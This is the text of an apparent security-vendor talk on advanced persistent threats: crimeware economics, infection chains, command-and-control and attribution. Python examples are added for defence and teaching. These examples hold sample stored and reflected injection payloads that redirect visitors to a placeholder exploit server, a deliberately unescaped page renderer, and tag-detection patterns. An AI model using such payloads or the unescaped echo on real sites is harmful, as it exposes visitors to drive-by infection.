Advanced Persistent Threat Observations, Techniques and Countermeasures
Outline of Talk
• APT: What is it? What it isn't...
• High Level Observations: 4 facts (I believe)
• You're Already P0wn3d! How APT Succeeds
• The Problems/Gaps in Current Enterprise Security
• How to Prepare Your Organization for Detecting and Responding to APT
Wake Up Call
"Google cyber attacks a 'wake-up' call" - Director of National Intelligence Dennis Blair
My mom now knows what I do for a living... "yes mom, I worked on some of that stuff"... "wow", she said.
http://www.csmonitor.com/USA/2010/0204/Google-cyber-attacks-a-wake-up-call-for-US-intel-chief-says
APT: What is it? It isn't malware!
• A human being or organization who operates a campaign of intellectual property theft using cyber methods
  - Malware, malware
  - People, Processes, Technology
• Basically the same old problem, but it's getting far worse and far more important than ever before
  - Old school: kids and hackerz, for reputation
  - Now: adults and kids, for cyber warfare and espionage
MI5 says the Chinese government "represents one of the most significant espionage threats"
http://www.timesonline.co.uk/tol/news/uk/crime/article7009749.ece
Espionage
APT: Think Military Operations
• Military doctrine approach
  - ISR (intelligence, surveillance, and reconnaissance)
  - Mission planning
    - What is our goal? "Steal the source code for the new xyz search engine and cloud computing software platform"
    - How do we achieve the goal with least risk? Have really good intelligence
      - Get some spies on the inside to help gather information from a "trusted insider" perspective
      - Perhaps they will have access through their job, so there is no need to steal!
      - If that doesn't work
High Level Observations
• Fact 1: Sophisticated criminal attacks and what appear to be state-sponsored attacks are increasingly becoming the focus of IT security operations and efforts in many vertical markets today: government, energy, finance, technology, critical infrastructure.
• Fact 2: Existing IT security investments are required, but ineffective at detecting and blocking modern attacks and protecting enterprise data.
Source: E-Crimes & Advanced Persistent Threats Report, 451 Group, March 2010
High Level Observations
• Fact 3: The APT malware we are seeing and hearing about is driving demand for new IT security solutions: more visibility, scalability, threat correlation and forensics.
• Fact 4: The ability to detect and react to new threats and attacks is hampered by a lack of reliable, impartial data, and by regulatory compliance, which has unfortunately supplanted security as the main driver of IT security investment.
Source: E-Crimes & Advanced Persistent Threats Report, 451 Group, March 2010
Anatomy of APT Malware
[Figure: implant capabilities shown around the command and control servers (server 1 to n): Survive Reboot, C&C Protocol, File Search, Process Injection, Update, Keylogger, Pass the Hash, USB Stick]
IP is Leaving The Network Right Now
• Everybody in this room who manages an enterprise with more than 10,000 nodes: YOU ARE ALREADY OWNED
• They are STEALING right now, as you sit in that chair.
The Coming Age of Cyber
• Advanced nations are under constant cyber attack. This is not a future threat, this is now. This has been going on for YEARS.
• Cyber cartels are rapidly going to surpass drug cartels in their impact on global security
  - The scope of finance will surpass drug cartels
  - The extent of the operation internationally
Big Brother (opennet.net)
Cash is not the only motive
• State sponsored (economic power)
• Stealing of state secrets (intelligence and advantage)
• Stealing of IP (competitive / strategic advantage, longer term)
  - Think Aurora
• Infrastructure & SCADA (wartime strike capability)
• Info on people (not economic)
  - e.g., Chinese dissidents
Why Enterprise Security Products DON'T WORK
The True Threat
• Malware is a human issue
  - Bad guys are targeting your digital information, intellectual property, and personal identity
• Malware is only a vehicle for intent
  - Theft of intellectual property
  - Business intelligence for competitive advantage
  - Identity theft for online fraud
The Scale
Over 100,000 malware samples are automatically generated and released daily. Signature-based solutions are tightly coupled to individual malware samples and thus cannot scale.
http://www.avertlabs.com/research/blog/index.php/2009/03/10/avert-passes-milestone-20-million-malware-samples/
Surfaces
• The attacks today are just as effective as they were in 1999
• The bad guys STILL HAVE their zero day, STILL HAVE their vectors, and STILL HAVE their malware
Not an antivirus problem
• Malware isn't released until it bypasses all the AV products
  - Testing against AV is part of the QA process
• AV doesn't address the actual threat: the human who is targeting you
• AV has been shown to be nearly useless in stopping the threat
  - AV has been diminished to a regulatory checkbox; it's not even managed by the security organization, it's an IT problem
Annealing / Continuum / Technology Lifecycle
[Figure residue: three "Value Horizon" plots of the area of attack over a technology's lifecycle. The first two are annotated with named attack surfaces; the partially legible labels include fragments of "Remote Windows", "overflow", "IIS Server", "bugs", "GDI image" and "Flash". The third is titled "Technology Lifecycle" with the region marked "Area of attack".]
Continuous Area of Attack
By the time all the surfaces in a given technology are hardened, the technology is obsolete.
[Figure: "Continuous area of attack" plotted against the value horizon over the technology lifecycle]
The Global Malware Economy
A Global Theatre
• There are thousands of actors involved in theft of information, from technology developers to money launderers
• Over the last decade, an underground economy has grown to support espionage and fraud
• This "malware ecosystem" supports both crimeware and e-espionage
[Figure: the malware economy as a flow of money between actors. Actors shown: Implant Vendor, Rootkit Developer, Rogueware Developer, e-Gold Wizard, Forger, Exploit Developer, Exploit Pack Vendor, Bot Vendor, Payment System Developer, Drop Man, Cashier / Mule, Bank Broker, Back Office Developer, Account Buyer, Affiliate, Botmaster, ID Thief, PPI, Endpoint Exploiters, Victims. Price and share tags shown: $10,000+ for 0-day (twice), $1,000+, $500+, $50, $100.00 per 1000 infections, $5.00 per account (sold in bulk), $5,000 increments, small transfers, keep 10% (twice), keep 50%, ~4% of bank customers. Other annotations: "Country that doesn't co-op w/ LE", "Country where account is physically located", "A single operator here may recruit 100's of mules per week".]
Crimeware and the State
• Using crimeware collected from the underground makes it harder to attribute the attack, since it looks like every other criminal attack
  - There is no custom code that can be fingerprinted... sort of
China
"there are the intelligence-oriented hackers inside the People's Liberation Army"
"There are hacker conferences, hacker training academies and magazines"
"loosely defined community of computer devotees working independently, but also selling services to corporations and even the military"
When asked whether hackers work for the government, or the military, [he] says "yes."
http://news.cnet.com/Hacking-for-fun-and-profit-in-Chinas-underworld/2100-1029_3-6250439.html
Crimeware Networks Go Legit
• Grown out of older adware business models
• Think fake antivirus
• There is a fine line between adware and malware
Pay-per-install.org
Earning4u pays per 1,000 infections (* http://www.secureworks.com/research/threats/ppi/)
PPI Programs (* http://www.secureworks.com/research/threats/ppi/)
Custom Crimeware Programming Houses
Anatomy of an APT Operation
Anatomy of an APT Operation
• You must understand that ongoing operations are underway; this involves one or more primary actors, and potentially many secondary actors
Malware Distribution Systems
• Human factor: don't rule it out, it is harder to catch
  - Think insiders being paid by your adversaries... maybe they are aware of the operation and maybe they are not
• Many attack vectors
  - Targeted browser attacks
  - Spear and whale phishing
  - Zero-day or well-known exploits
  - Slow and low, loud and proud: they do it all
  - Redirection: "I expect you to find my first 2 malware infections"
• Precise whale-phishing or spear-phishing attacks
  - Contain booby-trapped documents
• Backdoored physical media
  - USB, camera, CDs left in the parking lot, "gifts"
Booby Trapped Documents
• Single most effective focused attack today
• Human crafts text to look legitimate
Web Based Attack: Social Networking Space, Injected JavaScript
• Used heavily for large-scale infections
• And for targeted operations against specific groups of people
Trap Postings I
www.somesite.com/somepage.php: the attacker posts "Some text to be posted to the site ...." with a <script> ... </script> block embedded in the posting, which the site then renders for every other visitor.
Trap Postings II
www.somesite.com/somepage.php: the same posting, but carrying a hidden frame instead of a script block: <IFRAME src= style="display:none"></IFRAME> (the frame source is not shown on the slide)
SQL Injection
www.somesite.com/somepage.php: a SQL injection attack inserts IFRAME or script tags into the content the site serves
'Reflected' injection
• The link contains a URL variable with an embedded script or IFRAME*
• The user clicks the link, thus submitting the variable too
• The site (a trusted site, like .com, .gov, .edu) prints the contents of the variable back as regular HTML
*For an archive of examples, see xssed.com
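Added example (Python, not from the original slides): the reflected-injection pattern above as code. `render_vulnerable` prints a URL variable back as regular HTML, `render_hardened` encodes it first, and `find_injected_markup` scans a stored posting or a rendered page for the script and hidden-IFRAME markup of the trap-posting slides. The page URL, the parameter name q, the exploit-server hostname (a reserved .invalid name) and the tag and attribute patterns are assumptions for illustration, not taken from the talk.

```python
import html
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Constructed attacker input in the style of the "Trap Postings" slides:
# a hidden IFRAME pointing at an exploit server (hostname is a placeholder).
TRAP_POSTING = ('Some text to be posted to the site '
                '<IFRAME src="http://exploit-server.invalid/e.php" '
                'style="display:none"></IFRAME> ....')

# Reflected case: the injected markup travels in a URL variable (here "q",
# an assumed parameter name) and the site prints it back as regular HTML.
TRAP_LINK_QUERY = ('q=%3Cscript%3Edocument.location%3D'
                   '%22http%3A%2F%2Fexploit-server.invalid%2F%22%3C%2Fscript%3E')


def render_vulnerable(query_string: str) -> str:
    """Echoes the variable verbatim: whatever markup the link carried now
    runs in the context of the trusted site (reflected injection)."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<html><body><h1>Results for {q}</h1></body></html>"


def render_hardened(query_string: str) -> str:
    """Same page, but the variable is HTML-encoded before it reaches the
    response, so < > " ' & cannot open a tag or an attribute."""
    q = parse_qs(query_string).get("q", [""])[0]
    safe = html.escape(q, quote=True)
    return f"<html><body><h1>Results for {safe}</h1></body></html>"


# Detection side: tags that have no business in user-supplied content, plus
# the attribute tricks used to keep an injected IFRAME invisible.
TAG_RE = re.compile(r"<\s*(script|iframe|object|embed)\b([^>]*)>", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|"
                       r"\b(?:width|height)\s*=\s*[\"']?0\b", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)


def find_injected_markup(text: str) -> List[Dict[str, object]]:
    """Scan a stored posting (or a rendered page) for injected tags. Returns
    one finding per tag with its kind, its source URL and whether the markup
    tries to hide itself."""
    findings = []
    for m in TAG_RE.finditer(text):
        tag, attrs = m.group(1).lower(), m.group(2)
        src = SRC_RE.search(attrs)
        findings.append({
            "tag": tag,
            "src": src.group(1) if src else None,
            "hidden": bool(HIDDEN_RE.search(attrs)),
            "offset": m.start(),
        })
    return findings


if __name__ == "__main__":
    for f in find_injected_markup(TRAP_POSTING):
        print("stored posting:", f)
    print("vulnerable:", find_injected_markup(render_vulnerable(TRAP_LINK_QUERY)))
    print("hardened:  ", find_injected_markup(render_hardened(TRAP_LINK_QUERY)))
```

Regex scanning of HTML is a triage tool, not a parser: an attacker can split or encode tags to slip past it, so the output encoding in `render_hardened` is the control and the scanner is only the check.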
A three step infection
1. Injected JavaScript redirects the browser
2. Exploit server: browser exploit
3. Payload server: dropper
Eleonore (exploit pack)
Tornado (exploit pack)
Napoleon / Siberia (exploit pack)
Rogueware
• 35 million computers are infected every month with rogueware*
• Many victims pay for these programs ($50-$70), and stats show the bad guys are making upwards of $34 million a month with this scam*
• One of our sales guys bought into this: bought fake AV!
• Fake antivirus is now 10% of all search results
  - Google search "antivirus"
* http://www.pandasecurity.com/img/enc/The%20Business%20of%20Rogueware.pdf
Payload Server
• A machine that has the actual malware dropper ready for download
• The exploit server will redirect the victim to download a binary from this location
Command Control
Once installed, the malware phones home with: timestamp, source computer, username, victim IP, admin?, OS version, HD serial number, SAM file, security software, user names and passwords
Command Control Server
• The C&C system may vary
  - Custom protocol (Aurora-like)
  - Plain old URLs: very hard to identify
  - IRC (not so common anymore)
  - Stealth / embedded in legitimate traffic
  - Automation
  - DynDNS
• Machine identification
  - Infections stored in a back-end SQL database
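Added example (Python, not from the original slides): one way to surface the "plain old URLs" and DynDNS cases above in proxy logs. A malware check-in runs on a timer, so the gaps between one client's requests to the same host are nearly constant; the code measures that as the coefficient of variation of the inter-request intervals and also marks hosts under a dynamic-DNS suffix. The log format, the hostnames, the sample lines and the suffix list are all constructed for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed proxy log lines (format assumed): timestamp client method url status.
# The hostnames are placeholders; the no-ip.org suffix stands in for any
# dynamic-DNS provider.
SAMPLE_LOG = """\
2010-03-01T09:00:00 10.1.2.3 GET http://www.example.com/ 200
2010-03-01T09:00:02 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:10:01 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:12:40 10.1.2.3 GET http://www.example.com/news 200
2010-03-01T09:20:03 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:30:02 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:40:04 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:44:10 10.1.2.3 GET http://www.example.com/ 200
2010-03-01T09:50:03 10.1.2.3 GET http://updates.svchost-check.no-ip.org/check.php?id=4411 200
2010-03-01T09:51:00 10.1.2.4 GET http://www.example.com/ 200
2010-03-01T09:55:00 10.1.2.4 GET http://www.example.com/about 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Illustrative, not exhaustive: suffixes of free dynamic-DNS services, which
# the slides single out as something to block or at least watch.
DYNAMIC_DNS_SUFFIXES = (".no-ip.org", ".dyndns.org")


def parse_log(text: str) -> List[Tuple[datetime, str, str]]:
    """Return (timestamp, client, host) per line; malformed lines are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, _status = m.groups()
        host = urlsplit(url).hostname or ""
        out.append((datetime.fromisoformat(ts), client, host.lower()))
    return out


def is_dynamic_dns(host: str) -> bool:
    return host.endswith(DYNAMIC_DNS_SUFFIXES)


def find_beacons(text: str, min_hits: int = 5, max_cv: float = 0.2) -> List[Dict[str, object]]:
    """Group requests per (client, host) and flag pairs whose inter-request
    intervals are nearly constant: a low coefficient of variation (stdev/mean)
    is the signature of a timer-driven check-in rather than a human browsing."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, host in parse_log(text):
        by_pair[(client, host)].append(ts)

    beacons = []
    for (client, host), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons.append({
                "client": client, "host": host, "hits": len(times),
                "period_s": round(mean, 1), "cv": round(cv, 4),
                "dynamic_dns": is_dynamic_dns(host),
            })
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_LOG):
        print(beacon)
```

Real implants add jitter to the timer, so raise `max_cv` and lower `min_hits` cautiously; the dynamic-DNS flag and the fact that the same URL is fetched every time are the stronger indicators in this output.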
Command Control
These commands map to a foreign language keyboard.
IRC C&C
IRC control channel for a DDoS botnet. Most C&C has moved to the web.
Triad (botnet)
ZeuS (botnet)
Fragus (botnet)
Implants & Persistence
• The 'persistent' backdoor program
• Hide-in-plain-sight strategy
  - Some DLL that, to the trained eye, looks normal
• General purpose hacking tool
• Stealth capabilities
• In-field update capabilities
Poison Ivy (implant)
CRUM (protector)
Steal Credentials
Outlook email password, generic stored passwords
Steal Files
All the file types that are exfiltrated
Staging Server
• A place to store all the stolen goods before they get 'exfiltrated'
  - Data is moved off the network in a variety of ways: 'Hacking Exposed' level behavior
Drop Site
• Sometimes the stolen data is moved to a tertiary system, not the same as the C&C
Drop-point is in Reston, VA in the AOL netblock
Preparing to Detect and Respond to APT
Preparing to Detect and Respond to APT
• HOST / endpoint strategy: servers and workstations
  - Physical memory analysis capabilities
  - Physical disk analysis capabilities
    - Think forensic visibility "everywhere"
    - Multiple endpoints will be involved; need to view them ALL at the lowest levels possible: RAW disk and RAW memory
    - Need to be able to search EVERYTHING for indicators of compromise (IOC)
  - Endpoint, live-state forensics, ongoing monitoring
• NETWORK: all ingress and egress points
  - Collection, archiving, analysis, alerting, indexing, correlation
After Detection & Remediation, Our Goals Are Attribution
• Is attribution possible?
  - Sometimes yes, sometimes no
  - Preparation is 90%; luck is a big part too
• The bad guy doesn't change that much
  - Repeated use of the same exploit methods
  - Repeated use of the same C&C system
• His intention is singular
  - Identity theft or IP theft, you pick
  - If IP theft, is it specific? Insight into why someone is after you
    - You know what to protect
Threat Intelligence is Important to Manage the Risk and Apply Resources
• Who is targeting you?
• What are they after?
• Have they succeeded?
• How long have they been succeeding?
• What have I lost so far?
• What can I do to counter their methods?
• Are there legal actions I can take?
Information Points Pulled from Malware Analysis
• Drop site where IP is being dropped
  - IP address, server version, country of origin
• Command control server
  - Version of C&C, fingerprint
  - Designed to survive takedowns
  - Hot staged failovers likely
  - Dynamic DNS: must block, or at least be aware of it!
• Exploit pack server
  - Version of exploit pack, fingerprint
Intel Feeds: make use of these and others
• malwaredomainlist.com
• abuse.ch
• spamcop.net
• team-cymru.org
• shadowserver.org
Forensic Marks left by Actors
• Forensic marks occur at all points where software development occurs
• They also occur in less obvious places
  - All points where the binary is translated into new forms (parsed, packaged, etc.)
• These forensic marks may identify the original developer of the software
• Obviously, only certain actors leave marks
Digital Fingerprints
• Several actors in the underground economy will leave digital fingerprints
• What is represented digitally
  - Distribution system
  - Exploitation capability
  - Command control
  - Payload (what does it do once it's in)
The developer != operator
• The developer may not have any relation to those who operate the malware
• The operation is what's important
• Ideally, we want to form a complete picture of the 'operation': who is running the operation that targets you and what their intent is
[Figure: the same malware compiled in three different ways, shown as the disk file and as the in-memory image after the OS loader. MD5 checksums are all different; code idioms remain consistent.]
[Figure: the starting malware passed through Packer #1 and Packer #2, then decrypted by the OS loader into the in-memory image. The unpacked portions remain consistent; in-memory analysis tends to defeat packers.]
[Figure: different malware authors using the same toolkit. In the in-memory image the toolkit marks and developer signatures can be detected even though the packed files differ.]
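Added example (Python, not from the original slides): why the MD5 values differ while the idioms stay constant, and why the in-memory image matters. A constructed byte string plays the role of the malware body; it is wrapped as a plain disk file, as a packed file (a toy XOR packer, not a real one) and as a rebuilt binary with a different header and padding. Byte n-gram Jaccard similarity stands in for idiom matching. The headers, the packer, the stub marker and the thresholds are assumptions for illustration, not HBGary's method.

```python
import hashlib
from typing import Dict, Set

N = 4  # byte n-gram length; spans the short x86 idioms below

# Constructed stand-in for a malware code body (not real malware): a few
# x86-looking prologue / call / epilogue idioms, the sort of thing a compiler
# or toolkit emits the same way in every build.
PROLOGUE = b"\x55\x8b\xec\x83\xec\x10"            # push ebp; mov ebp,esp; sub esp,0x10
EPILOGUE = b"\x8b\xe5\x5d\xc3"                    # mov esp,ebp; pop ebp; ret
CALL_TEST = b"\xe8\x00\x00\x00\x00\x85\xc0\x74"   # call rel32; test eax,eax; jz
CORE = b"".join([
    PROLOGUE, CALL_TEST, b"\x33\xc0\x40\x5e", EPILOGUE,
    PROLOGUE, b"\x8b\x45\x08\x50", CALL_TEST, EPILOGUE,
    PROLOGUE, b"\x6a\x00\x6a\x01", CALL_TEST, b"\x33\xc0\x40\x5e", EPILOGUE,
])

# Three "samples" of the same code. Headers are placeholders, not a real PE layout.
DISK_FILE = b"MZ" + b"\x90" * 30 + b"PE\x00\x00" + b"\x00" * 24 + CORE + b"\x00" * 16
XOR_KEY = 0xA7
# Packed: a stub marker followed by the XOR-encoded body; on disk it shares
# almost no bytes with CORE.
PACKED_FILE = b"MZ" + b"\x90" * 30 + b"STUB" + bytes(x ^ XOR_KEY for x in CORE)
# Rebuilt: same source, different build settings (other header bytes, int3
# padding after every ret).
REBUILT_FILE = (b"MZ" + b"\x00" * 30 + b"PE\x00\x00" + b"\xff" * 24
                + CORE.replace(EPILOGUE, EPILOGUE + b"\xcc\xcc"))


def md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def ngrams(data: bytes, n: int = N) -> Set[bytes]:
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: Set[bytes], b: Set[bytes]) -> float:
    return len(a & b) / len(a | b) if (a or b) else 1.0


def idiom_similarity(a: bytes, b: bytes) -> float:
    """Fraction of shared byte n-grams: survives a different MD5, a different
    header and different padding, because the idioms themselves are unchanged."""
    return jaccard(ngrams(a), ngrams(b))


def unpack_in_memory(packed: bytes, key: int) -> bytes:
    """Model of what the packer stub does once the OS loader has mapped the
    file: the encoded body is decoded in place, so a memory image holds the
    original code again."""
    body_start = packed.index(b"STUB") + 4
    return packed[:body_start] + bytes(x ^ key for x in packed[body_start:])


def hashes() -> Dict[str, str]:
    return {"disk": md5hex(DISK_FILE), "packed": md5hex(PACKED_FILE),
            "rebuilt": md5hex(REBUILT_FILE)}


def compare() -> Dict[str, float]:
    memory_image = unpack_in_memory(PACKED_FILE, XOR_KEY)
    return {
        "disk_vs_packed_on_disk": idiom_similarity(DISK_FILE, PACKED_FILE),
        "disk_vs_packed_in_memory": idiom_similarity(DISK_FILE, memory_image),
        "disk_vs_rebuilt": idiom_similarity(DISK_FILE, REBUILT_FILE),
    }


if __name__ == "__main__":
    print(hashes())
    for name, score in compare().items():
        print(f"{name:28s} {score:.2f}")
```

The three MD5 values are unrelated, the packed file on disk scores near zero against the original, and only the decoded in-memory image scores high again: the signature has to be taken from what the code does in memory, not from the bytes on disk.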
Country of Origin
• Country of origin
  - Is the bot designed for use by a certain nationality?
• Geolocation of the IP is NOT a strong indicator
  - However, there are notable examples
  - Is the IP in a network that is very unlikely to have a third-party proxy installed?
    - For example, it lies within a government installation
[Figure: C&C map from Shadowserver, C&C for a 24 hour period]
Language
• Native language of the software, expected keyboard layout, etc.: intended for use by a specific nationality
  - Be aware some technologies have multiple language support
• Language codes in resources
Actor: Endpoint Exploiter (Follow the $$)
• The exploiter of the end nodes sets up the XSS or JavaScript injections to force redirects
• Newcomers can learn various attack methods from their PPI affiliate site (mini-training)
• These are generally recruited hackers from forums (social space)
• The malware will have an affiliate ID
  - "somesite.com/something?aflid=23857": look for potential IDs; this ID identifies the individual endpoint exploiter
Endpoint Exploiters: $100.00 per 1000 infections
[Figure: link analysis from the URL artifact (codenamed C&C, botmaster fingerprint) through unique affiliate IDs to the infected endpoints]
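Added example (Python, not from the original slides): extracting affiliate IDs such as aflid=23857 from observed URLs and soft-linking endpoints and hosts through them, the first step of the link analysis the figure sketches. The parameter-name list, the hostnames (built on the slide's somesite.com placeholder) and the observations are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qsl, urlsplit

# Parameter names that pay-per-install kits commonly use to carry the
# affiliate number (assumed list; extend it from your own samples).
AFFILIATE_PARAMS = {"aflid", "affid", "aff", "aid", "pid", "partner"}

# Constructed observations: (infected endpoint, URL the malware called).
# Hosts follow the somesite.com placeholder used on the slide.
OBSERVATIONS = [
    ("ws-0142", "http://somesite.com/something?aflid=23857&v=3"),
    ("ws-0173", "http://somesite.com/something?aflid=23857&v=3"),
    ("ws-0201", "http://cdn.somesite.com/in.php?aid=23857"),
    ("ws-0210", "http://othersite.com/gate.php?affid=991"),
    ("ws-0211", "http://somesite.com/something?v=3"),          # no affiliate marker
    ("ws-0222", "http://somesite.com/something?aflid=30011&v=3"),
]


def affiliate_ids(url: str) -> Set[str]:
    """Every value carried under an affiliate-style parameter name."""
    ids = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=False):
        if name.lower() in AFFILIATE_PARAMS and re.fullmatch(r"[A-Za-z0-9_-]{1,32}", value):
            ids.add(value)
    return ids


def link_analysis(observations) -> Dict[str, Dict[str, Set[str]]]:
    """Soft-link endpoints and C&C/redirect hosts through the affiliate ID:
    one ID seen across several hosts is one endpoint exploiter working several
    distribution systems; one host seen with several IDs is one botmaster
    paying several exploiters."""
    by_id: Dict[str, Dict[str, Set[str]]] = defaultdict(
        lambda: {"endpoints": set(), "hosts": set()})
    for endpoint, url in observations:
        host = (urlsplit(url).hostname or "").lower()
        for aid in affiliate_ids(url):
            by_id[aid]["endpoints"].add(endpoint)
            by_id[aid]["hosts"].add(host)
    return dict(by_id)


def hosts_by_affiliate_count(observations) -> List[Tuple[str, int]]:
    """Hosts ranked by how many distinct affiliates feed them (the botmaster side)."""
    per_host: Dict[str, Set[str]] = defaultdict(set)
    for _endpoint, url in observations:
        host = (urlsplit(url).hostname or "").lower()
        per_host[host] |= affiliate_ids(url)
    return sorted(((h, len(ids)) for h, ids in per_host.items()),
                  key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    for aid, links in link_analysis(OBSERVATIONS).items():
        print(aid, sorted(links["endpoints"]), sorted(links["hosts"]))
    print(hosts_by_affiliate_count(OBSERVATIONS))
```

The affiliate ID is only a soft link: the same number can be reused across kits, and an operator can run several IDs, so treat the clusters as leads to confirm against the C&C fingerprint and the social space rather than as attribution on their own.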
Actor: Bot Master
• Owns the box that accepts inbound infection requests, pays out by ID
  - Pays for numbers of collected credentials
  - Collects stolen identities and resells them
  - Accounting system for all successful infections
• Pay-per-infection business model
  - This implies a social space
• Configuration settings on the server will be reflected in client infections (additional resolution to differentiate multiple actors using the same bot technology)
• Version of the bot system offers more resolution, and a potential indicator of when it was stood up
• The bot master will have a preference for a particular bot control system; this can be soft-linked to the actor
Actor: Account Buyer
• Buys stolen creds from the collectors
• Uses stolen credentials to move money out of victim bank accounts
  - These guys touch the victim accounts
• Source IP of the transaction, use of TOR / Hack TOR, use of a botnet to redirect, etc.
  - This part is audited in your network logs, so...
  - Multiple attacks by the same person are likely to be cross-referenced
  - Not a very strong fingerprint
Actor: Mules & Cashiers
• Accept stolen money into accounts in the native country of the subverted bank and redirect that money back out into foreign accounts
  - These transactions must stay below trigger levels
  - $5,000 or less
• These actors do not leave forensic marks on the malware chain
  - Banking records only
Actor: Wizards
• Move e-Gold into ATM accounts that can be withdrawn in the master's home country
• Will take a percentage of the money for himself
• This actor does not leave a forensic mark on the malware chain
  - Banking records typically don't even work here, as the transaction has already been processed through e-Gold
Actor: Developers
• Sell bot systems for four figures
  - $4,000 - $8,000 with complete C&C and SQL backend
• Sell advanced rootkits for low five figures
  - Possibly integrated into a bot system
  - Possibly used as a custom extension to a bot, integrated by a botmaster; $10,000 or more easily for this
• All of this development is strongly fingerprinted in the malware chain
We want to find a connection here
[Figure: link analysis joining the C&C fingerprint and botmaster, the URL artifact and affiliate ID leading to the endpoints, and the developer's protocol fingerprint and C&C products leading back to the developer]
Soft linking into the Social Space
• Where is it sold, and does that location have a social space?
  - If it has a social space, then this can be targeted
  - Forum, IRC, instant messaging
• Using link analysis, a soft link can be created between the developer of a malware product and anyone else in the social space
  - Slightly harder link if the two have communicated directly
  - If someone asks for tech support, that indicates they have purchased
  - If someone queries price, etc., then possibly they have purchased
[Figure: link analysis between the software author and the social space]
Working back the timeline
• Who sells it, and when did that capability first emerge?
  - Requires ongoing monitoring of all open-source intelligence and presence within underground marketplaces
  - Requires budget for acquisition of emerging malware products
[Figure: link analysis between the software author and the social space, using the timeline to differentiate links, e.g. a technical support query made AFTER the version 1.4 release]
Actor: Vuln Researchers
• Paid well into the five figures for a good, reliable exploit
  - $20,000 or more for a dependable IE exploit on the latest version
• Injection vector and activation point can be fingerprinted
  - Method for heap grooming, etc.
  - Delivery vehicle
In Conclusion
• To prepare for APT
  - Must develop teams with expertise in ALL 4 disciplines of computer system forensics, from WOMB TO TOMB:
    - Network traffic capture and analysis at all ingress and egress points
    - Host disk data
    - Host RAM data
    - Malware analysis and reverse engineering
    - People, Process, Technology
• Go 'beyond the checkbox'
  - Invest in solutions to "Mitigate Risk" or limit loss and exposure to real threats
• Funded adversaries with intent will never stop until they achieve their goals...
  - Cleaning up an infection doesn't mean squat... How do you know if you got it all?
HBGary: Thank You
• www.hbgary.com
• Cyber Security Solutions for the Enterprise
  - Active Defense with Digital DNA: enterprise malware detection, continuous monitoring and response system
  - Digital DNA™: codified detection of zero-day malware
    - Integrated into several enterprise products (McAfee ePO, Guidance EnCase, more to be announced)
  - Responder™: malware analysis and physical memory forensics
  - Recon: malware sandbox, kernel tracing for malware forensics
- Slides: 95